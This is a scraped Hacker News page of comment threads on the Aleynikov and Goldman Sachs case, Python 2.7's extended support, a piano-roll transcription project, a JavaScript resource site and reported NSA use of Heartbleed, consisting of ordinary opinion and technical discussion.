I love EU! US, pay attention. This is how you do civil liberties. It seems EU is becoming the new beacon of democracy and civil liberties in the 21st century (if we ignore UK, which seems more interested in being another US state than an EU one, anyway, but without any rights to vote in the former).
NicoJuicy 5 days ago 0 replies      
I'm actually curious about which effects this ruling in the United Kingdom (Brittain).

Although they are subject to this regulations, considering their censorship the last years, i don't believe they are willing to coperate on this (like they are not willing to drop the British pound in favor of the )

Just a thought.

shmerl 5 days ago 0 replies      
Great decision. I hope in US something similar will happen. But somehow I doubt that it will in the current sick climate.
atmosx 5 days ago 1 reply      
hm. This is important, extremely important. I'm very happy as an EU citizen for the direction the EU has been taking lately on technology matters.

I'm not fond of the EU, Brussels or anything, but there's a string of positive decisions in technology related matters that not many people seem to understand. That's good.

CharlesKCarillo 5 days ago 0 replies      
Great news, though I guess politicians will find loop holes in this decision that will let them do it anyways, albeit slightly differently.
acd 5 days ago 1 reply      
EU is run by a leader who is an ex Mao communist and the head banker is ex Goldman Sachs. I trust them not.


Excerpt from Flash Boys about Serge Aleynikov and Goldman Sachs cryptome.org
310 points by peterbotond  1 day ago   198 comments top 35
ntakasaki 1 day ago 4 replies      
Continuing the story from his Wiki page:

In March 2011, Aleynikov appealed the conviction, asking the Second Circuit to review the District Court's decision denying his original motion to dismiss the indictment for failure to state a claim.[9]

On February 16, 2012, the United States Court of Appeals for the Second Circuit heard oral argument on his appeal and, later that same day, unanimously ordered his conviction reversed and a judgment of acquittal entered, with opinion to follow.[10] Aleynikov was released from custody the next day.

On April 11, 2012, Dennis Jacobs, Chief Judge of the United States Court of Appeals, published a unanimous decision in a written opinion[10] stating:

On appeal, Aleynikov argues, inter alia, that his conduct did not constitute an offense under either statute. He argues that: [1] the source code was not a "stolen" "good" within the meaning of the NSPA, and [2] the source code was not related to or included in a product that is produced for or placed in interstate or foreign commerce within the meaning of the EEA. We agree, and reverse the judgment of the district court.[9]

In the course of these events, Aleynikov has spent 11 months in prison. Aleynikov has divorced, lost his savings, and his career is ruined.[11]

The government did not seek reconsideration of the Second Circuit's ruling, thus ending federal action against Aleynikov.[12]

rdtsc 1 day ago 1 reply      
For those that don't know, Serge is a great Erlang and C++ programmer and he contributes to open source (had some pull requests to Erlang itself).

Here is his Github account:


You can find his posts on Erlang's mailing list once a while.

Two of his interesting project I am following:

https://github.com/saleyn/erlexec -- a utility to control OS process from Erlang.

https://github.com/saleyn/eixx/ -- Erlang to C++ interface.

Mikeb85 1 day ago 3 replies      
Read the GPL carefully, very carefully...

An organisation counts the same as an individual, and as long as code stays within the organization that doesn't count as 'distribution', and Goldman Sachs is under no obligation to release the code. They even retain the rights to prevent the code being released.

It's easy to hate on Goldman Sachs for many things, but in this case they didn't violate the GPL, and Aleynikov did commit a crime.

yukichan 1 day ago 2 replies      
This sucks, but seriously never talk to the police. Don't write anything down. Don't say anything. Don't sign anything. Tell them your name and otherwise just stay silent. They are never trying to help you, they're trying to close their case.
zx2c4 1 day ago 2 replies      
> He deleted his bash history the commands he had typed into his own Goldman computer keyboard. To access the computer, he was required to type his password . If he didnt delete his bash history, his password would be there to see, for anyone who had access to the system.

Wait, what?

muyuu 1 day ago 2 replies      
Sounds to me like it was Aleynikov who didn't understand the severity of the crime he committed.

I work in a similar environment and I'm fully aware that if I do something remotely like bringing my code from work home, holy crap I'm committing a very VERY serious crime and my employer would go after me as viciously as they could. Very especially if I were to be going somewhere else where this code would set me up to make a new competing engine.

Pushing stuff to SVN and mailing seem innocuous... but depending on what you are actually passing around they can be extremely serious crimes.

mcv 1 day ago 0 replies      
Old story. Definitely sucks for him, but mailing yourself proprietary code of a very secretive and ruthless bank is not exactly the smartest thing to do.
infinotize 1 day ago 0 replies      
Amazing how naive in some regards a very smart person can be. You don't send yourself source code, and you definitely don't talk to police without a lawyer, or invite them into your house.
artellectual 1 day ago 0 replies      
Seems to me here, the biggest lesson one can learn from this story is don't work for companies like Goldman Sachs. if they don't want to get with the times and understand how the world they don't understand works then they deserve to be technically behind. So on top of not understanding your work as a developer instead of learning how things work, they choose to abuse the law. Worse part is the law is like a big spider web where it traps the small guys while the tigers and elephants walk right through, there is no justice here no matter how many sections you quote or how many laws you read. Best thing is to just be smart and not get involved. There are many opportunities out there for talented developers.
dfc 1 day ago 0 replies      
I don't understand this bit about the DNI:

  US master  spy Clapper says  spies steal open source,  then immediately  claims ownership and  classifies it, and prosecutes if  the material is  disclosed, like Goldman Sachs.
What did Clapper do?

crystaln 1 day ago 0 replies      
So, he emailed source code to himself (yes that was illegal and violated his employment contract,) deleted the bash history (there are plenty of other ways to prevent your password from showing up in history,) waived his right to a lawyer, talked endlessly with an FBI agent and was surprised (?!) that the agent was not a computer expert, then signed a confession.

Sorry if I fail to have much sympathy. If you play in the big leagues, you should at least have some sense of self preservation.

bayesianhorse 1 day ago 1 reply      
Moral of the story: If you don't want to be thrown in jail for stealing something you didn't steal, don't sign a confession...

In fact it sounds as if the defendant actually phrased most of the confession himself...

FD3SA 1 day ago 1 reply      
The programmer types were different from the trader types. The trader types were far more alive to the bigger picture, to their context. They knew their worth in the marketplace down to the last penny. They understood the connection between what they did and how much money was made , and they were good at exaggerating the importance of the link. Serge wasnt like that. He was a little-picture person, a narrow problem solver. I think he didnt know his own value, says the recruiter.

This infuriates me to no end. These engineers need to be rounded up, and given a serious life lesson on the reality of markets. Knowing your product/service's worth is step 1 of any free market activity.

Engineering is the only profession where the most talented engineers occupy the lowest compensation brackets with respect to their worth. All sorts of bullshit excuses are made up for this (my favorite - they're "Specialists"), but the bottom line is they are not being compensated at anywhere near what they're worth.

This is why startups, and consulting firms, are so key. If the market you're trying to enter is too big for a small operation (like Wall St.), then just consult. Those 20 superstar programmers need to meet up and start a consulting firm. Then, they sell their services to these banks and charge them whatever they want (read: a lot).

They then use this compensation to hire the best engineers from across the world, and keep them out of Wall St's hands. This wouldn't be too difficult, because Wall St would never match salaries because they are traders, and would die before they paid an engineer more than themselves.

To all of HN: please don't underestimate your worth. It hurts everyone, including yourself.

gflateman 1 day ago 0 replies      
flash boys also talks about the FBI's suspicion when they heard Aleynikov was using software called 'subversion', and assuming he was thus doing something 'subversive'

that cracked me up!

Natsu 1 day ago 0 replies      
> On the night of his arrest, Serge waived his right to call a lawyer. [...] Then he sat down and politely tried to clear up the confusion of this FBI agent who had arrested him without an arrest warrant.

These are things no sane person should do, especially if they're innocent.

doktrin 1 day ago 0 replies      
What repeatedly stands out every time I read of this account is the relative ineptitude of the federal agents handling the investigation.

There appears to be every indication that agent McSwain did everything short of taking explicit marching orders from GS.

The FBI either lacked the will or ability to understand the crimes they were tasked with investigating. I find that disturbing.

ececconi 1 day ago 0 replies      
The original link didn't mention this was an excerpt from Flash Boys so I had no clues Michael Lewis wrote it. I've never read any of his books. Now I want to because he actually writes pretty well.
auggierose 1 day ago 4 replies      
There is a simple solution to this. When you publish open source software, make sure that in your license it says that Goldman Sachs is not allowed to use this code for any purpose whatsoever.
fredgrott 1 day ago 0 replies      
the problem I have with the article is that FOSS/OSS used internally and modified for that use and not distributed would mean under normal copyright and work rules that yes GS did own the changes to OSS/FOSS used internally but never distributed.
ig1 1 day ago 4 replies      
Flagged because article completely misunderstands how GPL works. GPL doesn't apply if you modify source-code to use internally, it only applies if you distribute it externally to third party users.

[GPL not mentioned in article; my recollection from the original court documents is that the code was largely LGPL and GPL code]

ithought 1 day ago 0 replies      
His federal conviction was overturned then they later recharged him for the same incident in state court. Also Congressman Lamar Smith, who sponsored SOPA, amended the Economic Espionage Act of 1996 with the Theft of Trade Secrets Clarification Act of 2012 specifically related to this case.

Sergey's Legal Defense Fund - http://www.aleynikov.org/

kylemaxwell 1 day ago 1 reply      
I thought the policy here was to use the actual title of the article, not to edit it. Why did the moderators change it?
PythonicAlpha 1 day ago 0 replies      
That is the problem with invention vs. "intellectual property". Inventions belong to the inventor -- property belongs to the owner.
hynahmwxsbyb 1 day ago 2 replies      
I wonder how much this cost Goldman from a talent perspective.
yoamro 1 day ago 0 replies      
Trying to sympathize with the guy, but signing a confession?....just doesn't make sense
leccine 1 day ago 0 replies      
Lesson learned, don't ever work for Wall Street.
eriktrautman 1 day ago 0 replies      
I don't normally bring this up but in this case the site formatting is essentially unreadable for someone with poor eyesight who needs to expand the text and make the container narrow to avoid constant left/right scrolling.
kayoone 1 day ago 1 reply      
"Aleynikov was employed for two years, from May 2007 to June 2009, at Goldman at a salary of $400,000.[1] He left Goldman to join Teza Technologies, a competing trading firm which offered to triple his pay.[5]"

jeez, those banks pay a pretty penny.

james-bronze 1 day ago 0 replies      
(I'm sorry if I do this incorrectly; first time posting plus I'm on an app)

"Serge tried to explain why he always erased his bash history, but McSwain had no interest in his story. The way he did it seemed nefarious, the FBI agent would later testify."Whom is the FBI agent referring to, McSwain or Serge?

zenbowman 1 day ago 1 reply      
Goldman is a nest of parasites and vultures, do we really expect anything more from them?
caycep 1 day ago 1 reply      
probably OT...but Cryptome posting an excerpt from a Michael Lewis book? that's a bit out of character...
senthilnayagam 1 day ago 0 replies      
so effectively Goldman Sacks killed the potential competing high performance trading platform
notastartup 1 day ago 0 replies      
This is batshit insane. Wall Street is fucking insane. I hope Serge wins a huge lawsuit.
zorbo 1 day ago 4 replies      
Okay, so.

* misleading title. Goldman Sachs stole nothing.

* This guy steals code from Goldman Sachs.

* Covers his tracks. There is almost no reason why your password ever ends up in your bash history. If it does, you edit out only the password. Or you put a space before the command you run. At any rate, this guy should have known how to prevent his password from getting in the shell history and had no reason to delete his history.

* The guy talks to the cops

* Waves his rights to a lawyer

* Signs a confession

* Lets cops into his house without a search warrant.

* Doesn't testify at this trial.

This guy fully deserved what was coming to him. Goldman Sachs did nothing wrong here.

Extend Python 2.7 life till 2020 python.org
308 points by oal  13 hours ago   241 comments top 35
drewcrawford 9 hours ago 4 replies      
There are a lot of comments here from people who aren't on the python-dev list and don't really understand what this diff actually means.

The core developers are not required to maintain 2.7 post-2015, and most of them won't be involved in it. That part hasn't changed.

What is happening is that Red Hat is preparing to cut a RHEL 7 release, which AFAIK depending on how much you pay them they support for 13 years. So they will need to figure out how to support 2.7 themselves at least through 2027.

Here is where I am reading between the lines. RH are well within their right to fork Python and keep their maintenance patches to themselves and their customers (Python's not copyleft). But, they are nice guys and so maybe they are willing to upstream their changes at least for awhile if there is still a Python project willing to accept them. Again, this is my speculation based on the ML discussion, not what RH has actually said they will do.

An analogy can be made to Rails LTS, a commercial fork of Rails 2.x that patio11 was involved in [0]. Inevitably somebody is going to step in to support 2.7, and so let's see what we can do to avoid a situation where the only way to keep running 2.7 is to subscribe to RHEL.

Meanwhile, there are some large companies that use 2.7 extensively on Windows (e.g. Enthought, Anaconda) and the thinking goes that somebody can probably be found to produce a Windows installer once in awhile, assuming that Python.org will still host a download.

So really what is happening here is not very exciting. The core committers aren't doing anything different than leaving the project as originally planned. What is happening is that they will leave the lights on in the source control repository and on the FTP server, so as to capture the free labor from people at large companies who have an interest in continuing to support 2.7.

The alternative is that RH and other vendors create proprietary and expensive forks of Python 2.7. That may end up happening anyway, but it will take longer for your employer to notice you should stop contributing your patches back if binaries still appear on python.org and you don't have to ask IT to set up SCM and a bug tracker, etc.

[0] http://www.kalzumeus.com/2013/06/17/if-your-business-uses-ra...

chimeracoder 13 hours ago 7 replies      
This is really disappointing to see - I fear that it will slow adoption of Python 3 even further, when it was just reaching a tipping point[0].

When I first learned Python, I learned Python 3 first because it was newer, and I figured everyone would be using it soon enough. Little did I know that Python 2 would continue to be supported for over ten years after that!

Some people make a big deal about figuring out "which" Python to learn - that's not really much of an issue, because Python 3 isn't so different from Python 2 that it's hard to pick up the other very quickly (especially given how much has been backported to 2.7). But it's unfortunate to see people continuing to write new code in Python 2.

[0] http://python3wos.appspot.com/

eliben 10 hours ago 1 reply      
I think many folks are reading too much into this. "Extended lifetime" is bug-fixes. The final planned release is 2.7.9 in 2015 - beyond that there will be source-only releases for major security problems. No new features, no non-critical bug fixes.

So this isn't really making Python 3 any less appealing. But the Python core developers cannot with a calm heart abandon all the users of 2.x, given the state of adoption today.

Udo 10 hours ago 3 replies      
Speaking as a Python outsider, this looks pathological. If backwards compatibility is such a big hindrance in switching from 2 to 3, why not ship a v2 legacy fallback interpreter along with the new stuff? If you wanted to make it fancy, you could even make a 3-to-2 bridge that allows people to run v2 code from v3.

Am I missing something here?

PythonicAlpha 12 hours ago 1 reply      
This is a result of some not so optimal design decisions in the past.

I remember, when Py3 first came out, everything was incompatible -- unnecessary incompatibilities like the u" notation for Unicode string literals that was dropped. Unnecessary incompatibilities in the C-extension-module implementation layer. And so on. The list of incompatibilities was just huge.

Later several of them where dropped, like the string literal trouble ... But than the trouble was already done. Many extension modules where not lifted to the new version, since the overhead was to big.

I think, many more projects would have adopted Py3, if more extension modules would support it.

The huge library of extension modules was always the strength of Python. Now we have many projects still running on Py2, because Py3 did ignore this strength.

yason 11 hours ago 3 replies      
How I'm not surprised.

Python 3 didn't offer anything that would have been so useful and desirable that people would've jumped on it the moment it was released. In fact, it was actually a bit worse than Python 2 when it was out and those Python 2 users could continue enjoying loads of libraries to go with, and of course they knew how to navigate around Python 2's quirks so why bother. Sadly, this is still what I think of Python 3: "Why bother?".

Python 3 didn't have enough to warrant a 'v3', really: Python 3 could've just been Python 2.7 if it wasn't for the religious backwards compatility in Python, which, ironically seems to matter a lot. The syntactic and semantic differences weren't big enough that Guido couldn't have worked around the most important improvements into 2.x line and dropped less relevant stuff (like removing 'print' statement etc).

Even if Python 2.7 would've needed some changes to existing libraries, the psychological barrier would've been lower. It's about "Fixing my lib to work with Python 2.7 which is top of the line today" versus "Porting my lib to Python 3.0 which will be the official Python in a few years": guess which one sounds more appealing? Note that the amount of work in both cases wasn't that big.

I think mainstream Python will be 2.x till Python 4 is out.

crusso 12 hours ago 5 replies      
I just got back into some Python programming after a 2+ year hiatus from the language.

I'm stunned that this 2.x vs 3.x debate is still happening and that 99% of all libraries in use* haven't been converted to 3.x. I like the language, but ... damn... If it weren't for the scikit/numpy stuff, I'd stick with Ruby. The Ruby community seems much less fragmented and wants to see the language move forward. It helps a lot that the 800 pound gorilla, Rails, keeps up with Ruby releases.

edit:* By that, I mean that the conversion rate for commonly used libraries hasn't hit 99%.

username223 26 minutes ago 0 replies      
Good news. They have another 5-6 years to recognize their mistake and cut Python 3 loose from Python, like Perl did with Perl 6. It's interesting how the same underlying mistake manifests itself in different cultures: Perl 6 was "we'll break all your code, but give you gonzo new features that we hope are useful." Python 3 was "we'll break all your code, but soothe some pedants and browbeat you into accepting the result."
wirrbel 10 hours ago 0 replies      
The best way would be to release a python 2.9 which incorporates most of the changes from 2 to 3 but the unicode change.

The between Python 2 and Python 3 was just too wide. Even with breaking changes, with a small people will just migrate eventually. Migrating projects drag each other over the "barrier" just like water in a hose can be sucked over a wall.

The issue definitely was not the print command, but other things such as ``iteritems()``, etc - by themselves not much to keep you from migrating, but there is a pile of these boring changes next to the big one (unicode).

I think Guido overestimated the appeal of the new unicode handling and underestimated how resentful people are to change. I figure that at least 1/4 of programmers are actually very opposed to each and every migration and a new version has to have enough incentives to counterbalance this built-in conservativeness.

Ellipsis753 1 hour ago 0 replies      
I just thought I'd like to know what Hacker News thinks.Will Python 2.x ever die?

I'm still writing lots of code with it and even quite a lot of new code. It's been around for ages and it feels like almost no libraries have been ported to 2.x yet. On a couple of occasions I've started a project with Python 3.x just to drop it or move to Python 2.x as a library I need doesn't seem to exist for Python 3.x and I don't want to port it over myself. I've never had this issue with 2.x (no libraries support 3.x only.)

Most Python 3.x "killer features" have been back-ported to Python 2.x and I honestly feel little reason to upgrade myself now. When support for Python 2.7 is officially dropped we could fork it and continue. I would hope it wouldn't take huge amount of effort for some people to support it? Just fix bugs and security issues and take pull requests? In that way might Python 2.x even outlive Python 3.x or at least remain more popular?

makmanalp 12 hours ago 5 replies      
I see many comments talking about how this will slow down the migration process. But I don't think the situation is that bad.

Most of the py3 wall of superpowers is now green (https://python3wos.appspot.com/) with boto, mysql-python, nltk, python-openid being some of the rare few in terms of not having great py3 alternatives. And most of these have ports on the way already.

So one interesting effect of this is that now that there is some critical mass and people are starting new projects in python3, there is now pressure on package maintainers to have py3 ports. So it's users dragging the packages forward now rather than the packages dragging the users backwards.

overgard 9 hours ago 2 replies      
The lesson here is that it's important to "sell" new versions of anything. You can't just expect people are going to upgrade because it's the new hotness. Older versions of your own software are often your biggest competitor. (See also: Microsoft and Windows 8).
TazeTSchnitzel 13 hours ago 4 replies      
Oh for god's sake. Kill the damn thing already.

PHP 4 to 5 was a massive leap compared to Python 2 to 3, but they actually made that leap!

estebanrules 17 minutes ago 0 replies      
Can anyone point me in the right direction of an article that sums up how this whole fragmentation started? I'm curious to know the history.
shadowmint 12 hours ago 0 replies      
To be fair, what was the reasonable alternative?

Cede control of python 2.x to vendors who continue to demand support and bug fixes?

That would be a disaster; it'd be a moment away from new features and a 2.8 'cant believe its not python'.

borplk 13 hours ago 2 replies      
Damn. I hope my grandchildren see the day when Python 3 is commonplace.
reality_czech 10 hours ago 3 replies      
This is the path that all dynamically typed scripting languages must follow. Over time, change becomes impossible because the lack of typechecking or static analysis tools means that any change might break something in a subtle and hard-to-diagnose way. And so the language grows by accretion. You end up with something like bash or perl, where there are a million ways to do any one thing. Each way was added at a particular phase of the language's life, and it could never be removed after that. And so the language becomes difficult to learn and unattractive to newcomers, so another scripting langauge pops up, and the cycle of life begins again.

Compare this to a language like golang, where you can just run "go fix" on your code to update it to the latest version. And you don't have compatibility hell, because when you distribute your application, it's a standalone binary. Stuff like go is the future. Get off the dynamic language hamster wheel.

andr 10 hours ago 3 replies      
Since there still won't be a Python 2.8, I read this as the mainstream Python not evolving one bit for the next 6 years. For me, this would be grounds for moving to a different language.
dehrmann 12 hours ago 0 replies      
The Python shop I used to work at, and this is a shop with some pretty big fanboys and apologists, wasn't able to upgrade because of library support, and these are people who would like to.
bmoresbest55 7 hours ago 1 reply      
I understand that changing to Python 3 can be expensive but really all that any company or person is doing is prolonging the inevitable. If they have a good product/app/etc. that will last it will have to change to Python 3 and sometime in the future, right? Why keep waiting? Why support something that is considered by it's makers to be inferior? I really would like answers to these questions, if someone is willing.
undoware 13 hours ago 0 replies      
...also, he's renamed it "Python XP"
gaius 10 hours ago 1 reply      
By 2020 everyone will have moved onto OCaml anyway.
ishbits 11 hours ago 2 replies      
Anyone know if RHEL 7 will ship with Python 3 in the base, even if not default? That could go a long way to boosting Python 3 adoption.

I know it's in SCL, but that lacks convenience for a lot of users.

Walkman 10 hours ago 0 replies      
I just purged Python 3 from my computer. Will not serve much in the next 5 years I guess...
lucb1e 12 hours ago 3 replies      
This seems weird to me. Won't this cause a fork in Python at some point, where the 2.7 developers continue on 2.8 or rename it entirely, and another fork continues on what is now Python 3?
stefantalpalaru 13 hours ago 1 reply      
I still want to see a Python 2 fork getting the care it deserves. I don't trust the motivations of its current developers.
andhess 12 hours ago 1 reply      
Wow I'm very disappointed. I keep making the effort to transition more to 3, but am frustrated to see so many dependencies only work with 2.7, and thus maintain both libraries. I am tired of this limbo.
gkya 9 hours ago 0 replies      
Which kind of means forever?
estebanrules 8 hours ago 0 replies      
I really thought this thread was a prank or joke when I saw the title. Sadly, it's not. The whole 2.7 / 3.x debacle is a large part of why I I have more or less stopped coding in Python and moved on to Ruby. The community is a large part of it as well.
sigzero 9 hours ago 0 replies      
That is a huge mistake.
danso 11 hours ago 0 replies      
For reference's sake:

Python 2 was released Oct. 2000 and so will have a 20-year lifetime now. http://en.wikipedia.org/wiki/Python_(programming_language)#H...

Ruby 1.8, which was retired last year, had 10 years of life:https://www.ruby-lang.org/en/news/2013/06/30/we-retire-1-8-7...

Obviously, version numbers don't mean the same thing...and Ruby 1.8.x to Ruby 1.9.x (or even 2.x) seems less of a jump than 2.x to 3.x.

crimsonalucard 10 hours ago 0 replies      
This is like windows XP.
ssweens1 10 hours ago 0 replies      
Viva la 2.7!!!
mirsimiki 11 hours ago 0 replies      
open a shell and type 'import antigravity'
SEJeff 13 hours ago 3 replies      
Python 2.7.7 aka the Duke Nukem Forever edition!
Superhero.js One stop for JS Knowledge superherojs.com
301 points by sayanchowdhury  6 days ago   29 comments top 16
Oculus 6 days ago 1 reply      
For anyone looking for some good Javascript reads: http://javascriptissexy.com/

Unfortunately Richard Stanley hasn't updated the blog in more than 6 months, but in any case. If you want to sharpen your JS skills I'd highly recommend the site.

sheldor 6 days ago 2 replies      
Javascript Allonge is a great read and a must for newcomers and experienced devs. https://leanpub.com/javascript-allonge/read
kjbekkelund 6 days ago 1 reply      
We want more great stuff of Superhero.js, so we're open for suggestions here or in the GitHub issues: https://github.com/superherojs/superherojs/issues

We are thinking about adding a section on the most used libraries or frameworks, such as Backbone, Angular and Ember, but we will focus on the core JavaScript essentials until we feel it's good enough.

danbruc 6 days ago 1 reply      
If you want to become really good at X, you have to study Y instead of X where Y is the theory of all the things similar to X.
datashaman 6 days ago 1 reply      
A nod to Roy Lichtenstein might be in order, since the graphics are almost literal copies of his work.
enyaboi 6 days ago 0 replies      
This might be contrary to the "point" of the website, but you should touch upon Vanilla.js. http://vanilla-js.com
chadillac 6 days ago 1 reply      
I wrote this a while back to help some people on my team better understand some js quirkiness. Not sure if it's worth mentioning, but it trips a lot of people up.


rafeed 6 days ago 0 replies      
The website is so nice, and I thought all the material would be from the Superhero.js team too. Upon further review, they link to other sites, and some of them are not as user friendly and nice looking. The change of UI between each lesson/source is kind of an eye sore and sometimes annoying.

Nonetheless, thanks for putting this together!

djKianoosh 6 days ago 0 replies      
http://designpepper.com/a-drip-of-javascript/ is a nice weekly newsletter-ish resource
jabberbyte 6 days ago 0 replies      
Very nice indeed! Douglas Crockford has a series of videos on JS and a book "JavaScript the good parts". An extremely great resource you should consider adding. http://javascript.crockford.com/
caniscrator 6 days ago 0 replies      
This is great. Although books like 'eloquent javascript' or 'JS design patterns' prove themselves as stepping stones for one trying to get hold. However, when it comes to real world issues, blog posts by experienced professionals are ones only companions. Its good to see relevant posts in context, firstly describing problems that developers often face and then suggesting the solutions.
njx 6 days ago 0 replies      
Can you add a section - "SuperHeros for Hire - Freelance/one off work"?

I think there would be a great demand for people specialized in memory leak / performance tuning etc

teemo_cute 6 days ago 4 replies      
This is nice. Already bookmarked. The only confusion is at first 'superhero.js' sounds like a javascript library or framework.
charlieok 6 days ago 0 replies      
Tried putting the rss feed in feedly, but the entries don't link to pages on the site :(
fritz_vd 6 days ago 0 replies      
Awesome stuff. Although this has already been shown off here before: https://hn.algolia.com/?q=superhero.js#!/story/forever/0/sup...
jbeja 6 days ago 1 reply      
Great additions there sould be more site like this. Definitely bookmarked.
Transcribing Piano Rolls, the Pythonic Way zulko.github.io
295 points by gcardone_  2 days ago   35 comments top 16
eliteraspberrie 2 days ago 1 reply      
The faster way of doing this:

    def fourier_transform(signal, period, tt):        """ See http://en.wikipedia.org/wiki/Fourier_transform        How come Numpy and Scipy don't implement this ??? """        f = lambda func : (signal*func(2*pi*tt/period)).sum()        return f(cos)+ 1j*f(sin)
is using the FFT.

What you want is the power spectral density in the discrete case, called the power spectrum. It can be calculated by multiplying the discrete Fourier transform (FFT) with its conjugate, and shifting. NumPy can do it. Here is an example: http://stackoverflow.com/questions/15382076/plotting-power-s...

msvan 1 day ago 0 replies      
What a fascinating convergence of math, music and Python. Many people I meet who don't specialize in math but have taken university-level courses in it seem to remember the Fourier transform as a highlight, probably because of its many applications.
kbd 2 days ago 2 replies      
I love the abundance of Python. For those unaware, even the youtube-dl command line utility he used to download the video is written in Python.
selmnoo 2 days ago 0 replies      
That was a lovely read, thank you so much for writing and sharing it.
nanidin 2 days ago 1 reply      
Interesting question - is the author's transcription a derivative work of the video? And if so, is he actually allowed to release his transcription into the public domain (without the permission of the author of the video)?
rfleck 2 days ago 2 replies      
See a master at work making original rolls at QRS.http://www.youtube.com/watch?v=i3FTaGwfXPM

If was a fun place to see in the 70's after watchingmy father rebuild our player piano.

stevetjoa 1 day ago 0 replies      
Very cool!

Relevant: Zenph makes "re-performances" of old piano recordings. They take a recording, do music transcription magic to get the exact timings and velocities of each note event, and then feed that into a player piano. So it's as if you are listening to the ghost of Rachmaninov sitting at the piano, as shown here: https://www.youtube.com/watch?v=eevzbV6Hkkk&t=28 (music starts at 0:28)

(I just visited http://zenph.com for the first time in about a year, and it appears that they've pivoted into a music education company.)

ntoshev 1 day ago 2 replies      
What if you tried to transcribe the music solely from Fourier transform of the audio source? I expect the piano has an abundance of harmonics, but there should be some way to distinguish them from the keys. Hasn't someone done it already?
bede 1 day ago 0 replies      
My favourite blog post of 2014. Thank you for sharing.
analog31 1 day ago 0 replies      
I think this is a nice solution because it takes care of the hardware side of things by making use of a garden variety video camera.
elwell 2 days ago 1 reply      
Really fantastic hack. Now try transcribing with just the audio track.
StavrosK 1 day ago 0 replies      
This is beautiful, it's one good idea after another, good job!
cdelsolar 1 day ago 0 replies      
So, so cool. I love posts like this.
smortaz 2 days ago 1 reply      
fantastic. with your permission, i'd love to use this to demo python!
peapicker 2 days ago 0 replies      
This is really nice, thanks for sharing it with us.
evidencepi 2 days ago 0 replies      
Nice post, thanks for sharing!
NSA Said to Exploit Heartbleed Bug for Intelligence for Years bloomberg.com
294 points by taylorbuley  2 days ago   174 comments top 40
spenvo 2 days ago 0 replies      
Here we observe a side affect of the NSA/GHCQ operating in a manner which always gives offensive capability precedence over the defense of civilian systems.

In case you haven't made the time yet -- ACLU's interview of Snowden at SXSW was excellent and dives into the implications of this: https://www.youtube.com/watch?v=UIhS9aB-qgU

On another (ironic) note this PSA from the US government is about 2 years late: http://www.bbc.com/news/technology-26985818

molecule 2 days ago 4 replies      
Bloomberg really puts its bias on display:

> The Heartbleed flaw, introduced in early 2012 in a minor adjustment to the OpenSSL protocol, highlights one of the failings of open source software development.

And its discovery and resolution highlights one of the advantages of open-source software development.

danenania 2 days ago 1 reply      
I don't know if Heartbleed could reach this point, but I think probably the only possibility for getting average citizens up in arms about this kind of thing is for them to start seeing major personal detrimental effects (like oops, all my email has been stolen and deleted and my bank account's empty), and then learn that the NSA could have easily prevented it if they weren't having so much fun being super-hackers instead.
jobu 2 days ago 2 replies      
This looks like another case where the actions of the NSA are the opposite of what's in the best interest of US Citizens.
JackC 2 days ago 0 replies      
I've been seeing a lot of comments recently along the lines that we "need" more evidence before we assume that the NSA took advantage of heartbleed. I don't get that at all.

I'd love to have harder evidence of what the NSA has been up to. I get that. But here are some things we know: the NSA believes its mission is to collect 100% of the world's data, with the possible exception of data that definitely belongs to US citizens. The NSA has boasted internally of cracking SSL implementations as part of its work. The NSA employs more people who are qualified for and tasked with finding this kind of exploit than anyone else. The NSA's leadership is willing to lie under oath to Congress -- let alone to anyone else -- about its activities. The NSA's secrets are about as heavily defended as secrets can be -- actually providing the kind of evidence requested here is widely considered treason against the United States. And now an investigative reporter with a serious reputation says that he has two sources who can confirm that the NSA knew about heartbleed shortly after it was created.

So let's assume you might behave differently in some way -- in any way -- if the NSA knew about and exploited heartbleed. You have imperfect information and you have to make a call. What else could you "need" before you decide to behave as though this article is accurate?

I think we "need" to assume that the NSA took advantage of heartbleed starting shortly after it was introduced. We'd just "like" to have a little more confirmation about what the hell they've been up to.

mindstab 2 days ago 1 reply      
Evidence? And if so, pretty much what we expected and exactly why this behaviour is terrible
tptacek 2 days ago 1 reply      
Yeah, that's not good.
jostmey 2 days ago 1 reply      
The NSA protected us by not disclosing to us a serious security vulnerability in our software. It is hard for me to wrap my brain around reasoning of the intelligence agencies.
mschuster91 2 days ago 2 replies      
No fucking way. This is disastrous PR stuff, second only to the Snowden revelations.

It should be clear by now that the NSA does not restrict themselves from anything... and should be disbanded.

bhousel 2 days ago 1 reply      
Whether it's true or not, I think the correct thing for the NSA to do would be to say that they knew about it for years and exploited it. That is their job, after all.
antonius 2 days ago 0 replies      
Good luck trying to wiggle out of this one, NSA.
mcculley 2 days ago 0 replies      
This is according to "two people familiar with the matter". While nobody would be surprised that the NSA had exploited heartbleed, this article gives no compelling proof.

I wish newspaper articles had a bit of metadata that indicated whether the sources are verifiable. Then we wouldn't have to waste any time reading them when they aren't.

ArtDev 2 days ago 0 replies      
It flies in the face of the agencys comments that defense comes first

The NSA needs to be dissolved. It is a costly liability whose actions work against the nations interests as a whole.

jrochkind1 2 days ago 1 reply      
> The agency found the Heartbleed glitch shortly after its introduction, according to one of the people familiar with the matter,

Presumably if the anonymous sources here were discovered, they'd be in big criminal trouble, right? I am curious how far the government goes to try and discover them.

And I think there is no way these anonymous sources would have contacted the journalists without Snowden going first, to establish the context and interest. Snowden's actions continue to benefit us all, cascading.

thefreeman 2 days ago 0 replies      
So is there a single shred of evidence besides something unquoted by `two people familiar with the matter said`

because if not this is just straight up link bait.

taylorbuley 2 days ago 1 reply      
The NSA is denying this report.

> Statement: NSA was not aware of the recently identified Heartbleed vulnerability until it was made public.


lawnchair_larry 2 days ago 0 replies      
It's going to be pretty hard to say you're playing "defense" with a straight face after this one.
ChrisLTD 2 days ago 0 replies      
The US government seems intent on destroying the viability of the Internet as a commerce platform.
jrochkind1 2 days ago 1 reply      
> The SSL protocol has a history of security problems, Lewis said, and is not the primary form of protection governments and others use to transmit highly sensitive information.

> I knew hackers who could break it nearly 15 years ago, Lewis said of the SSL protocol.

Anyone know wtf he's talking about?

humancontact 2 days ago 0 replies      
> two people familiar with the matter said

As much as Snowden has shown us the amount of effort NSA puts into this kind of stuff, I think we need more evidence than this article is giving.

higherpurpose 2 days ago 0 replies      
This is how NSA "protects America" and its infrastructure from "cybercrime" - by allowing a bug like this to exist for years without telling anyone about it.

I hope it's now clear to everyone what NSA's vision about "cybersecurity" is. They think having vulnerabilities like this in the Internet's infrastructure is a good thing, because then they get to attack their "targets", to "protect us". It has nothing to do with actual security. Weakness is strength. Vulnerability is security.

